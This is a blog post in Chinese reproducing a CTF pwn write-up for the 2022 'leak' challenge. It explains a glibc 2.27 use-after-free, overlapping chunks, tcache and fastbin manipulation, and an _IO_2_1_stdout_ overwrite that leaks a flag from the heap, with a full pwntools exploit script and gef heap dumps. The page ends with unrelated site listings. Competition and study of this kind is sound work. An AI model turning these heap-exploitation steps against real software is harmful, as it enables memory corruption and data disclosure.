[祥云杯 2022] pwn2 leak
admin
2024-01-18 22:27:37
0

看了看雪的WP,第一次见这个东西,复现一下。

libc-2.27-3Ubuntu1.6-amd64

这个版本的libc禁用了3u1的直接double两次free的地址不能相同,并且_IO_2_1_stdout_头部也是清空的不能通过覆盖一个尾字节泄露地址,同时题目没有show。但是题目会把flag请入到堆中。

如是我闻:

1,通过建立重叠块利用unsort残留修改后指向_IO_2_1_stdout_将写入终地址(堆地址都是55XXX,写FF填充即中)

2,释放块填满tcache,再释放放入fastbin,当tcache用完后使用fastbin时,如果tcache有空位会把fastbin剩余放入,并把fastbin第1块指针位置处bk写入堆起始地址

题目很容易看,有add,edit,free其中free有UAF

void m3free()
{unsigned __int64 n; // [rsp+8h] [rbp-8h]write_s("Index: ");n = read_n();if ( n <= 0xF ){if ( qword_2143A0[n] )free((void *)qword_2143A0[n]);}
}

先布局个堆

    add(0, 0x30)add(1, 0x500)add(3, 0x30)add(4, 0x10)add(5, 0x10)add(11, 0x40)

先设置个重叠块2在0和1块的中间,可以覆盖到1的头部,通过修改1在大小反复释放得到相应的bin

    #make a overlap on 0.5 建一个块与1重叠,以后通过它修改1的头和fdedit(1, flat(0,0,0,0x4f1,0,0x4e1))edit(0, flat(0,0,0,0x41))free(0)free(3)edit(3, p8(0xc0))add(12, 0x30)add(2, 0x30)  # 2= 0.5  overlap chunk1.head

bins的准备:

1,先放一个50的块到tcache,将来这个位置释放成unsort后,指针指向main_arena修改到_IO_2_1_stdout_ 用这个tcache块建块到_stdout_

    #将0x50放入tcacheedit(2, flat(0,0,0,0x51))free(1)       # 1 size 0x50 tcache

2,释放0x20的块填满tcache然后释放一块到fastbin

    #先将0x20的tcache填满,再释放1个到fastbinedit(2, flat(0,0,0,0x21,0,0))  #fill tcachefor i in [4,5,4,5,4,5,4]:free(i)edit(i, p64(0))free(1)   #fastbin

修改回510头,释放到到fd->main_arena

    #改为500释放得到main_arena指针edit(2, flat(0,0,0,0x511))free(1)       #unsort fd->main_arena

利用第1步准备的50块,在stdout_写入止地址(半字节爆破)

    #gdb.attach(p)#pause()#lh = int(input('lh'), 16)#将块改为50,修改fd后两字节(爆破半字节)将原指向main_arena的指针指向_IO_2_1_stdout_ x760lh = 0xcedit(2, flat(0,0,0,0x51)+p8(0x60)+p8(lh*16+7))add(13, 0x40)add(14, 0x40)  # _IO_2_1_stdout_edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))   #写入输出止地址

修改指向_stdout+8 (以此为起点bk写入的位置是_IO_2_1_stdout_+0x20)建块用把tcache再建,会在指针指向处的bk位置写入堆地址。

    # fastbin reverse into tcache  2.27-3u1.6 利用bk指针写入到_IO_2_1_stdout_#将_IO_2_1_stdout_ 改为 +8,建第1个块用掉tcache,建第2个块使用fastbin,剩余部分会放入tcache,fastbin->next指针处写入heap地址#0x60   0 0,0x21,0,(heap)edit(2, flat(0,0,0,0x21)+ p8(0x68)+p8(lh*16+7))add(15, 0x10)add(6, 0x10)

最后选菜单6退出,执行exit(0)会输出*(stdout_ + 0x20)到*(+0x28)两个地址间的数据(由于止址写入的是fff所以会非常多,只需要0x250后的一小块)

    p.sendlineafter(b"Your choice: ", b'6')p.recv(0x250)print(p.recv(0x100))p.interactive()

完整的WP和当时的堆状态

from pwn import *elf = ELF('./leak')
libc_elf = ELF('/home/kali/glibc/2.27-3u1.6-amd64/libc-2.27.so')
context(arch='amd64', log_level='debug')def add(idx, size):p.sendlineafter(b"Your choice: ", b'1')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", str(size).encode())def edit(idx, msg):p.sendlineafter(b"Your choice: ", b'2')p.sendlineafter(b"Index: ", str(idx).encode())p.sendafter(b"Content: ", msg)def free(idx):p.sendlineafter(b"Your choice: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())def pwn():global pp = process('./leak')#lh = int(input('lh:'), 16)add(0, 0x30)add(1, 0x500)add(3, 0x30)add(4, 0x10)add(5, 0x10)add(11, 0x40)#make a overlap on 0.5 建一个块与1重叠,以后通过它修改1的头和fdedit(1, flat(0,0,0,0x4f1,0,0x4e1))edit(0, flat(0,0,0,0x41))free(0)free(3)edit(3, p8(0xc0))add(12, 0x30)add(2, 0x30)  # 2= 0.5  overlap chunk1.head#将0x50放入tcacheedit(2, flat(0,0,0,0x51))free(1)       # 1 size 0x50 tcache#先将0x20的tcache填满,再释放1个到fastbinedit(2, flat(0,0,0,0x21,0,0))  #fill tcachefor i in [4,5,4,5,4,5,4]:free(i)edit(i, p64(0))free(1)   #fastbin#改为500释放得到main_arena指针edit(2, flat(0,0,0,0x511))free(1)       #unsort fd->main_arena#gdb.attach(p)#pause()#lh = int(input('lh'), 16)#将块改为50,修改fd后两字节(爆破半字节)将原指向main_arena的指针指向_IO_2_1_stdout_ x760lh = 0xcedit(2, flat(0,0,0,0x51)+p8(0x60)+p8(lh*16+7))add(13, 0x40)add(14, 0x40)  # _IO_2_1_stdout_edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))   #写入输出止地址# fastbin reverse into tcache  2.27-3u1.6 利用bk指针写入到_IO_2_1_stdout_#将_IO_2_1_stdout_ 改为 +8,建第1个块用掉tcache,建第2个块使用fastbin,剩余部分会放入tcache,fastbin->next指针处写入heap地址#0x60   0 0,0x21,0,(heap)edit(2, flat(0,0,0,0x21)+ p8(0x68)+p8(lh*16+7))add(15, 0x10)add(6, 0x10)p.sendlineafter(b"Your choice: ", b'6')p.recv(0x250)print(p.recv(0x100))p.interactive()while True:try:pwn()except:passbreak    '''
gef➤  heap bins
─────────────────────────────────────── Tcachebins for arena 0x7fa6fa1ebc40 ───────────────────────────────────────
Tcachebins[idx=0, size=0x20] count=7  ←  Chunk(addr=0x7fa6fa1ec778, size=0x0, flags=) 
Tcachebins[idx=3, size=0x50] count=255  ←  [Corrupted chunk at 0xfbad2084]
──────────────────────────────────────── Fastbins for arena 0x7fa6fa1ebc40 ────────────────────────────────────────
Fastbins[idx=0, size=0x20] 0x00
Fastbins[idx=1, size=0x30] 0x00
Fastbins[idx=2, size=0x40] 0x00
Fastbins[idx=3, size=0x50] 0x00
Fastbins[idx=4, size=0x60] 0x00
Fastbins[idx=5, size=0x70] 0x00
Fastbins[idx=6, size=0x80] 0x00
──────────────────────────────────── Unsorted Bin for arena '*0x7fa6fa1ebc40' ────────────────────────────────────
[+] unsorted_bins[0]: fw=0x558c5ff012d0, bk=0x558c5ff012d0→   Chunk(addr=0x558c5ff012e0, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
───────────────────────────────────── Small Bins for arena '*0x7fa6fa1ebc40' ─────────────────────────────────────
[+] Found 0 chunks in 0 small non-empty bins.
───────────────────────────────────── Large Bins for arena '*0x7fa6fa1ebc40' ─────────────────────────────────────
[+] Found 0 chunks in 0 large non-empty bins.
gef➤  x/8gx &_IO_2_1_stdout_
0x7fa6fa1ec760 <_IO_2_1_stdout_>:       0x00000000fbad1800      0x0000000000000000
0x7fa6fa1ec770 <_IO_2_1_stdout_+16>:    0x0000000000000000      0x0000000000000000
0x7fa6fa1ec780 <_IO_2_1_stdout_+32>:    0x0000558c5ff01010      0x00005fffffffffff
0x7fa6fa1ec790 <_IO_2_1_stdout_+48>:    0x0000000000000000      0x0000000000000000
gef➤  heap chunks
Chunk(addr=0x558c5ff01010, size=0x250, flags=PREV_INUSE)[0x0000558c5ff01010     07 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x558c5ff01260, size=0x40, flags=PREV_INUSE)[0x0000558c5ff01260     66 6c 61 67 7b 54 65 73 74 2e 2e 2e 2e 2e 2e 2e    flag{Test.......]
Chunk(addr=0x558c5ff012a0, size=0x40, flags=PREV_INUSE)[0x0000558c5ff012a0     00 00 00 00 00 00 00 00 10 10 f0 5f 8c 55 00 00    ..........._.U..]
Chunk(addr=0x558c5ff012e0, size=0x20, flags=PREV_INUSE)[0x0000558c5ff012e0     68 c7 1e fa a6 7f 00 00 00 00 00 00 00 00 00 00    h...............]
'''

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:R数据分析:扫盲贴,什么是多重插补

下一篇:C/C++内存泄漏的原因以及怎么解决

相关内容

热门资讯

安卓系统国外能用吗,探讨安卓系... 你有没有想过,当你拿着那部心仪的安卓手机,准备出国旅行或者工作的时候,会不会突然发现,哎呀妈呀,这安...
健康怀仁安卓系统下载,健康相伴 你有没有想过,在这个信息爆炸的时代,拥有一款健康、稳定的操作系统是多么重要的事情呢?今天,就让我带你...
手机系统模拟安卓5.0,系统革... 你有没有想过,如果手机系统可以像安卓5.0那样模拟出来,会是怎样的体验呢?想象你手中的设备瞬间变身成...
关闭安卓电池检测系统,解锁续航... 你有没有发现,手机用久了,电池续航能力好像越来越不给力了?是不是觉得安卓系统的电池检测系统太烦人了?...
安卓系统变ios永久,探索系统... 你知道吗?最近在科技圈里可是掀起了一股热潮呢!那就是安卓系统用户纷纷转向iOS系统的现象。这究竟是怎...
安卓系统虚拟按键失灵,原因排查... 手机里的安卓系统突然间出了点小状况,虚拟按键失灵了!这可真是让人头疼不已。想象你正沉浸在游戏的世界里...
安卓北京交警系统繁忙,揭秘安卓... 最近北京的小伙伴们有没有发现,打开手机上的安卓交警系统,那可真是忙得不亦乐乎啊!不信?那就跟着我一起...
苹果和安卓互用系统,共创未来 你有没有想过,为什么你的苹果手机上的应用,有时候也能在安卓手机上顺畅运行呢?这背后,其实有一个神奇的...
安卓系统强制内置相机,隐私与安... 你知道吗?最近在安卓系统上,有一个让人有点摸不着头脑的小变化引起了大家的关注。那就是安卓系统竟然开始...
安卓系统读书app推荐,安卓系... 你有没有发现,随着智能手机的普及,阅读变得越来越方便了呢?尤其是在安卓系统上,各种各样的读书app层...
安卓系统新出的机型,探索【型号... 最近手机圈可是热闹非凡呢!安卓系统新出的机型层出不穷,简直让人眼花缭乱。今天,就让我带你一起探索这些...
安卓与苹果系统游戏,游戏生态对... 你有没有发现,现在手机游戏越来越流行了?不管是走在路上,还是在公交车上,总能看到大家低头玩着手机,那...
闭源系统和安卓开源系统,揭秘闭... 你有没有想过,为什么你的手机里装了那么多应用,却总感觉少了点什么?没错,就是那股自由自在的“玩”劲儿...
小米安卓系统密码破解,揭秘安全... 小米安卓系统密码破解:一场技术与道德的较量在数字化时代,手机已经成为我们生活中不可或缺的一部分。小米...
ios系统游戏转安卓系统游戏,... 你有没有想过,为什么有些游戏在iOS系统上玩得那么顺畅,一到安卓系统上就卡得跟什么似的?今天,就让我...
安卓90系统怎么下载,体验流畅... 你有没有发现,安卓90系统最近可是火得一塌糊涂呢!不少小伙伴都在问,安卓90系统怎么下载?别急,今天...
安卓系统主题免费字体,个性化你... 你有没有发现,手机里的字体有时候真的能改变心情呢?想象当你打开手机,看到那一个个活泼可爱的字体,是不...
安卓手机的rom系统,功能丰富... 你有没有发现,安卓手机的ROM系统就像是一层神秘的面纱,包裹着你的手机,让它焕发出不一样的光彩?今天...
宝马安卓系统音源切换,一触即达 你有没有发现,开宝马的时候,音乐播放的体验也是相当重要的呢?想象当你驾驶着宝马,窗外的风景如画,而车...
安卓怎样删除系统更新,轻松恢复... 手机系统更新了,是不是觉得新功能超酷,但有时候更新后的系统反而有点小闹心?别急,今天就来手把手教你如...